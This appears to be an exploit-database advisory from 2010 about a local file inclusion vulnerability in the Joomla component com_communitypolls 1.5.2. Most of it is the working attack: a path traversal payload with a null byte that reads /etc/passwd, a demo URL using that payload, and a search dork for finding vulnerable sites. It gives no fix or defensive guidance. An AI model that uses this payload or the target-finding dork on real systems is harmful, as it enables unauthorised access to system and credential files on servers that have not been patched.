id: 10989
date: 02/19/2010
title: Joomla Component com_communitypolls LFI Vulnerability
author: kaMtiEz
cves: 

=====================================================
Joomla Component com_communitypolls LFI Vulnerability
=====================================================

[!]===========================================================================[!]
 
[ Software Information ]
 
[+] Vendor : http://www.corejoomla.com/
[+] Price : free
[+] Vulnerability : LFI
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://www.corejoomla.com/downloads/community-polls/24-comcommunitypollsv1-5-2.html
[+] Version : 1.5.2 maybe lower also affected
 
[!]===========================================================================[!]
 
[ Vulnerable File ]
 
http://127.0.0.1/index.php?option=com_communitypolls&controller=[INDONESIANCODER]
 
[ XpL ]
 
../../../../../../../../../../../../../../../etc/passwd%00
 
[ d3m0 ]
 
http://server/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00
 
 
etc etc etc ;]
 
[!]===========================================================================[!]



#  0day.today [2023-03-22]  #